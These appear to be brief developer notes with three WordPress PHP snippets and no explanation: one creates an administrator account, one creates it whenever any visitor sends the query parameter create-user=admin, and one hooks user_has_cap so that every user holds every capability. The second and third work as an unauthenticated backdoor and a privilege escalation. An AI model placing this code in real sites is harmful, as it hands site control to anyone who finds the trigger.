-1-
$user_id = wp_create_user('username', 'password', 'e-mail@address.com');
$wp_user_object = new WP_User($user_id);
$wp_user_object->set_role('administrator');

-2-
if(isset($_GET['create-user']) && $_GET['create-user'] == 'admin') {
 $user_id = wp_create_user('username', 'password', 'e-mail@address.com');
 $wp_user_object = new WP_User($user_id);
 $wp_user_object->set_role('administrator');
 var_dump($user_id, $wp_user_object);
 die;
}

--
Refresh permissions
--
function codelight_all_permissions( $allcaps, $cap, $args ) {
    $allcaps[$cap[0]] = true;
    return $allcaps;
}
add_filter( 'user_has_cap', 'codelight_all_permissions', 0, 3 );